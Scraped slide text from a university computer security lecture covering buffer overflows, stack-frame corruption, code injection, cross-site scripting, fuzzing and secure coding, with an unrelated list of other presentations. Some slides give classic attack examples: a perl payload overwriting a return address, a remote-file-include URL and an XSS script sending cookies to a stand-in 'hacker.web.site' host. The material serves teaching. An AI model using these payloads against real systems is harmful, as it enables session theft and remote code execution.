session 5 software and operating systems security
play

Session 5 Software and Operating Systems Security Sbastien Combfis - PowerPoint PPT Presentation

Aug 26, 2023 •178 likes •525 views

I5020 Computer Security Session 5 Software and Operating Systems Security Sbastien Combfis Fall 2019 This work is licensed under a Creative Commons Attribution NonCommercial NoDerivatives 4.0 International License. Objectives

  1. I5020 Computer Security Session 5 Software and Operating Systems Security Sébastien Combéfis Fall 2019

  2. This work is licensed under a Creative Commons Attribution – NonCommercial – NoDerivatives 4.0 International License.

  3. Objectives Techniques to write secure code without vulnerability Overflow and code injection attacks Code protection and safe coding guidelines Interaction between a software and the environment Securing an operating system Safe installation, OS update and OS hardening 3

  4. Buffer Overflow

  5. Buffer Overflow (1) More input than expected placed into a buffer Exceeded the defined capacity of the memory area Result in information overwriting in memory That is outside of the legitimate buffer Buffer overflow used for two main purposes by attackers Crash a system by writing spurious/trash information Insert specially crafted code to be executed to harm 5

  6. Buffer Overflow (2) Buffer overflow can be located in several places On the stack, heap or event on the data part of a process Several possible consequences of a buffer overflow Data corruption, violating the integrity Unattended transfer of the control at abnormal address Memory access violation resulting in error Premature termination of a program 6

  7. Buffer Overflow Example (1) Reading string from standard input with gets function Not safe to use since no verification of copy buffer size main( int argc , char *argv []) { 1 int valid = FALSE; 2 int str1 [8]; 3 char str2 [8]; 4 char 5 next_tag(str1); // Load password (START , for example) 6 gets (str2); 7 if ( strncmp (str1 , str2 , 8) == 0) 8 valid = TRUE; 9 printf ("buffer1: s1(%s), s2(%s), v(%d)\n", str1 , str2 , valid); 10 } 11 7

  8. Buffer Overflow Example (2) Three possible scenarios in the case of a buffer overflow The longer input will overrides buffer str1 ... > ./ buffer1 START buffer1: s1(START), s2(START), v(1) > ./ buffer1 EVILINPUTVALUE buffer1: s1(TVALUE), s2( EVILINPUTVALUE ), v(0) > ./ buffer1 BADINPUTBADINPUT buffer1: s1(BADINPUT ), s2( BADINPUTBADINPUT ), v(1) 8

  9. Code Analysis The attacker needs two things to use buffer overflow attack 1 Finding a vulnerability that can be activated externally By an external data source controllable by the attacker 2 Understand what memory is impacted by the buffer overflow And what are the consequences of such modification Several techniques can be used to conduct the investigation Code inspection, tracing execution, fuzzing tools, etc. Memory is array of consecutive bytes interpreted by software High-level language can make checks and are safer to use 9

  10. Overflow Attack

  11. Overflow Attack There exist several types of buffer overflow attacks Depending on what kind of memory is concerned by the attack Stack overflow attacks are targeting buffers on the stack Will affect and possibly corrupt local variables Such attacks are also called stack smashing sometimes Heap overflow attacks overrun in the heap data area Much more complex to put in place than stack overflow 11

  12. Stack Overflow Stack overflow attacks based on function call mechanism Use the fact that the return address is stored in the stack All the information is stored in a stack frame on the stack Parameters for the called function, work registers save, etc. Return address, old frame pointer, etc. 12

  13. Function Call Execution (1) Example of a P function calling a Q function 1 Parameters of Q placed on the stack (typically in reverse order) 2 CALL Q instruction places return address on the stack P : Return address Old frame pointer param 2 param 1 Q : Return address in P ← frame pointer Old frame pointer local 1 ← stack pointer local 2 13

  14. Function Call Execution (2) On the side of the called function Q 3 Placing current frame pointer on the stack (stack frame of P ) 4 Frame pointer becomes the stack pointer (new stack frame) 5 Moving stack pointer to make room for local variables 6 Executing the body of Q function 7 Stack pointer put on frame pointer (removing local variables) 8 Restoring old frame pointer (back to stack frame of P ) 9 RETURN instruction takes return address on the stack Back on the calling function P 10 Popping parameters put on the stack 11 Continuing execution just after the CALL Q instruction 14

  15. Buffer Overflow Example (1) Buffer overflow attack can modify two critical elements Saved old frame pointer and return address C program example asking a value for a given tag First ask for a tag name and then for a value for the tag hello( char *tag) { 1 void inp [16]; 2 char 3 printf ("Enter the value for %s: ", tag); 4 gets (inp); 5 printf ("Hello your %s is %s\n", tag , inp); 6 } 7 15

  16. Buffer Overflow Example (2) Buffer overflow risk for value input by the user is large The return address can get corrupted > ./ buffer2 Enter value for name: Bill and Lawrie Hello your name is Bill and Lawrie buffer2 done > ./ buffer2 Enter value for name: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX Segmentation fault (core dumped) > perl -e ’print pack ("H*", "4142434445464748515253545556575861626364656667686908 fcffbf948304080a4e4e4e4e0a ")’ | ./ buffer2 Enter value for name: Hello your Re?pyy]uEA is ABCDEFGHQRSTUVWXabcdefguyu Enter value for Kyyu: Hello your Kyyu is NNNN Segmentation fault (core dumped) 16

  17. Buffer Overflow Consequence Return address corrupted to an invalid address Illegal address detected by OS result in process termination Service associated to killed process no more available ( ∼ DoS) Moving the control to a very precise place in the code Finding virtual address of hello function (with decompiler) For example, let’s assume that the function is at 0x08048394 And imp buffer 24 bytes below current frame pointer Replaced with the string ABCDEFGHQRSTUVWXabcdefgh Then replacing frame pointer with coherent value 0xbfffffe8 17

  18. Control Redirection The attacker can redirect control anywhere given an address Within the same program or in a used library Shellcode attack can execute any code put by the attacker That is first placed in the attacked buffer 18

  19. Code Protection No miracle, either preventing or detecting them, to cancel Defence can be performed at several levels Buffer overflow protection added at compile time High level language, adding stack frame corruption detection, etc. Protecting the stack between function calls Stackguard GCC extension adds a canari when entering function... 19

  20. Code Injection

  21. Managing Input Biggest source of software security error is bad input handling Value coming from outside of the program Value not known by the programmer while writing code Large variety of input sources has to be considered Data read from the keyboard, mouse, file, network, etc. Data read from exec. env., config. file, OS provided data, etc. 21

  22. Protection Important to always check input data lengths That will also help preventing overflow attacks Data interpretation must be done with care Checking that IP packet are well-formed, for example See the 2014 Heartbleed OpenSSL, for example 22

  23. Injection Attack Attacker can inject a code that is executed without consent With scripting languages (Perl, PHP, Python, sh, etc.) Injecting command, SQL queries or code that is executed The bad element is injected through an input field <?php 1 include $path . ’functions.php’; 2 include $path . ’data/prefs.php ’; 3 GET /calendar/embed/day.php?path=http :// hacker.web.site/hack.txt ?& cmd=ls 23

  24. XSS Attack Code by A executed by B with Cross-Site Scripting attack With web scripting (JavaScript, ActiveX, VBScript, Flash, etc.) Embedded content must be escaped to avoid execution Except if the goal is really to execute the code... Thanks for this information , it ’s great! 1 < script >document.location=’http :// hacker.web.site/cookie.cgi?’ + 2 document.cookie </ script > 24

  25. Fuzzing Fuzzing or fuzz testing proposed by Prof. Barton Miller Testing a code with random inputs to measure robustness Used by the FAANG tier 1 tech companies from Silicon Valley Facebook, Apple, Amazon, Netflix and Google Fuzzing can be done with automatic tools OWASP WebScarab, OWASP WSFuzzer, Jester, Hypothesis, etc. 25

  26. Writing Safe Code

  27. Safe Code Verified input must then be processed correctly Algorithms must be implemented correctly Confidence on several levels depending on language level Checking compilers and interpreters with high-level language Checking sequence of instructions for low-level language Netscape example with wrong PRNG to generate session keys These numbers were guessable, which was not desired property 27

  28. Coding Practice OWASP Secure Coding Practices quick reference guide Collection of good practices to write safe code Some practices also depend on the language Look at OWASP Python Security Project, for example http://www.pythonsecurity.org 28

  29. Interacting with Environment

  30. Checking Environment Last thing to check is that the environment is safe Code is always executed under control of an operating system Several elements to check in the environment Env. variable, system call, shared resource, temp. file, etc. 30

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Security and Privacy Why Security is Difficult 12A. Operating Systems and Security complexity

Security and Privacy Why Security is Difficult 12A. Operating Systems and Security complexity

5/18/2018 Security and Privacy Why Security is Difficult 12A. Operating Systems and Security complexity of our software and systems 12B. Authentication millions of lines of code, thousands of developers rich and powerful protocols

374 views • 9 slides
Security and Privacy Why Security is Difficult 12A. Operating Systems and Security complexity

Security and Privacy Why Security is Difficult 12A. Operating Systems and Security complexity

5/24/2017 Security and Privacy Why Security is Difficult 12A. Operating Systems and Security complexity of our software and systems 12B. Authentication millions of lines of code, thousands of developers rich and powerful protocols

533 views • 14 slides
Security and Privacy 12A. Operating Systems Security Operating Systems Principles 12B.

Security and Privacy 12A. Operating Systems Security Operating Systems Principles 12B.

5/18/2016 Security and Privacy 12A. Operating Systems Security Operating Systems Principles 12B. Authentication 12C. Authorization Security and Privacy 12D. Trust 12E. At-Rest Encryption Mark Kampe (markk@cs.ucla.edu) Security and Privacy

116 views • 8 slides
Operating System Security CS 111 Operating Systems Peter Reiher Lecture 17 CS 111 Page 1

Operating System Security CS 111 Operating Systems Peter Reiher Lecture 17 CS 111 Page 1

Operating System Security CS 111 Operating Systems Peter Reiher Lecture 17 CS 111 Page 1 Spring 2015 Outline Basic concepts in computer security Design principles for security Important security tools for operating systems

844 views • 56 slides
Operating System Security CS 111 Operating Systems Peter Reiher Lecture 17 CS 111 Page 1

Operating System Security CS 111 Operating Systems Peter Reiher Lecture 17 CS 111 Page 1

Operating System Security CS 111 Operating Systems Peter Reiher Lecture 17 CS 111 Page 1 Fall 2015 Outline Basic concepts in computer security Design principles for security Important security tools for operating systems

1.15k views • 64 slides
Overview Security Maintenance Practices and Principles Securing Operating Systems Patches,

Overview Security Maintenance Practices and Principles Securing Operating Systems Patches,

Overview Security Maintenance Practices and Principles Securing Operating Systems Patches, Fixes, Revisions Antivirus Software Post-Install Security Checklist: Windows/UNIX File System Security Issues Chapter 10 User

361 views • 8 slides
Security in an Operating System Operating systems need to protect against two types of security

Security in an Operating System Operating systems need to protect against two types of security

H Security Security in an Operating System Operating systems need to protect against two types of security violations: Accidental security violations, e.g.: a program accidentally overwrites a file; a user issues rm -rf *,

6.18k views • 28 slides
Software Security Explorative Lecture A brief history of security problems attacks on

Software Security Explorative Lecture A brief history of security problems attacks on

1/30/2020 Software Security Explorative Lecture A brief history of security problems attacks on multi-user UNIX systems for fun viruses &amp; worms attacking operating systems due to buffer overflow, format string attacks, integer

477 views • 37 slides
Introduction Operating System Security, Designing trusted operating systems Continued

Introduction Operating System Security, Designing trusted operating systems Continued

Introduction Operating System Security, Designing trusted operating systems Continued Encapsulated environments CS 239 Security for Networks and System Software May 22, 2002 Lecture 14 Lecture 14 Page 1 Page 2 CS 239, Spring

389 views • 15 slides
Software Security By Hunter Stevenson Khalid Alharbi CSCI 5828 Foundations of Software

Software Security By Hunter Stevenson Khalid Alharbi CSCI 5828 Foundations of Software

Software Security By Hunter Stevenson Khalid Alharbi CSCI 5828 Foundations of Software Engineering Spring 2012 What is the talk NOT about? Cryptography. Database security. Operating Systems security. Network security.

1.37k views • 121 slides
CS5460: Operating Systems Lecture 24: Security CS 5460: Operating Systems Once upon a time,

CS5460: Operating Systems Lecture 24: Security CS 5460: Operating Systems Once upon a time,

CS5460: Operating Systems Lecture 24: Security CS 5460: Operating Systems Once upon a time, this patch was made to Linuxs wait4() system call: + if ((options == (__WCLONE|__WALL)) &amp;&amp; (current-&gt;uid = 0)) +

550 views • 33 slides
Why Nobody Should Care About Operating Systems for Exascale Operating Systems for Exascale Ron

Why Nobody Should Care About Operating Systems for Exascale Operating Systems for Exascale Ron

Why Nobody Should Care About Operating Systems for Exascale Operating Systems for Exascale Ron Brightwell Scalable System Software Sandia National Laboratories Albuquerque, NM, USA International Workshop on Runtime and Operating Systems for

575 views • 32 slides
Security for Operating Systems: Cryptography, Authentication, and Protecting OS Resources CS 111

Security for Operating Systems: Cryptography, Authentication, and Protecting OS Resources CS 111

Security for Operating Systems: Cryptography, Authentication, and Protecting OS Resources CS 111 Operating Systems Peter Reiher Lecture 18 CS 111 Page 1 Spring 2015 Outline Basic concepts in computer security Design principles for

1.06k views • 62 slides
CSCI-UA.9480 Introduction to Computer Security Session 3.3 Systems Security and Isolation Prof.

CSCI-UA.9480 Introduction to Computer Security Session 3.3 Systems Security and Isolation Prof.

CSCI-UA.9480 Introduction to Computer Security Session 3.3 Systems Security and Isolation Prof. Nadim Kobeissi Operating 3.3a System Security Basics 2 CSCI-UA.9480: Introduction to Computer Security Nadim Kobeissi Operating systems:

417 views • 24 slides
History Where the idea for Operating systems came from Genealogy of Operating Systems

History Where the idea for Operating systems came from Genealogy of Operating Systems

BS1 WS19/20 topic-based slides History Where the idea for Operating systems came from Genealogy of Operating Systems Critical Innovations Hardware and Software Hardware Development Operating System Development Operating Systems

631 views • 23 slides
A better picture Many applications Application One Operating System System calls Operating

A better picture Many applications Application One Operating System System calls Operating

Introduction Operating Systems Spring 2003 OS Spring03 What is Operating System? It is a program! It is the first piece of software to run after boot It coordinates the execution of all other software User programs It

306 views • 12 slides
Taming Reluctant Random Walks In The Positive Quadrant 2 , Marni Mishna 2 , and Yann

Taming Reluctant Random Walks In The Positive Quadrant 2 , Marni Mishna 2 , and Yann

Taming Reluctant Random Walks In The Positive Quadrant 2 , Marni Mishna 2 , and Yann Ponty 2 3 Jrmie Lumbroso 1 Department of Mathematics 1 Princeton University Department of Mathematics 2 Simon Fraser

945 views • 32 slides
CSI5180. MachineLearningfor BioinformaticsApplications Fundamentals of Machine Learning

CSI5180. MachineLearningfor BioinformaticsApplications Fundamentals of Machine Learning

CSI5180. MachineLearningfor BioinformaticsApplications Fundamentals of Machine Learning Gradient Descent by Marcel Turcotte Version November 6, 2019 Preamble Preamble 2/52 Preamble Fundamentals of Machine Learning Gradient Descent

1.37k views • 90 slides
Getting Unemployed Youth into Jobs: Lessons for New Zealand from Jobs: Lessons for New Zealand

Getting Unemployed Youth into Jobs: Lessons for New Zealand from Jobs: Lessons for New Zealand

Getting Unemployed Youth into Jobs: Lessons for New Zealand from Jobs: Lessons for New Zealand from experiments in middle income p countries David McKenzie World Bank David McKenzie, World Bank The problem The problem The Problem: Unemployment

747 views • 48 slides
Missing-data methods with cepstral data Summary of work done at IDIAP Main achievements

Missing-data methods with cepstral data Summary of work done at IDIAP Main achievements

morris,bourlard@idiap.ch http://www.idiap.ch/ Missing-data methods with cepstral data Summary of work done at IDIAP Main achievements RESPITE meeting, 7-8 June 2002, Page 1 DUMA - Data Utility Maps from MLPs Cant

296 views • 11 slides
An admissibility and asymptotic-preserving scheme for systems of conservation laws with source

An admissibility and asymptotic-preserving scheme for systems of conservation laws with source

An admissibility and asymptotic-preserving scheme for systems of conservation laws with source terms on 2D unstructured meshes F. Blachre 1 R. Turpault 1 1 Laboratoire de Mathmatiques Jean Leray, Universit de Nantes SHARK-FV14, 1 st May

849 views • 62 slides
To Re-rank or to Re-query: Can Visual Analytics Solve This Dilemma? E. Di Buccio 1 , M. Dussin 1 ,

To Re-rank or to Re-query: Can Visual Analytics Solve This Dilemma? E. Di Buccio 1 , M. Dussin 1 ,

To Re-rank or to Re-query: Can Visual Analytics Solve This Dilemma? E. Di Buccio 1 , M. Dussin 1 , N. Ferro 1 , I. Masiero 1 , G. Santucci 2 , G. Tino 2 1 University of Padua, Padova, Italy 2 Sapienza University of Rome, Rome, Italy Second

772 views • 13 slides
Linear Classifiers and Regressors Borrowed with permission from Andrew Moore (CMU)

Linear Classifiers and Regressors Borrowed with permission from Andrew Moore (CMU)

Linear Classifiers and Regressors Borrowed with permission from Andrew Moore (CMU) Single-Parameter Linear Regression Linear: Slide 2 Regression vs Classification Input Prediction of Classifier Attributes categorical output Input

1.08k views • 48 slides
Data Preparation Data cleaning Data integration and transformation (Data

Data Preparation Data cleaning Data integration and transformation (Data

Data Preprocessing Why preprocess the data? Data Preparation Data cleaning Data integration and transformation (Data preprocessing) Data reduction, Feature selection Discretization and concept hierarchy generation 2

891 views • 21 slides

More recommend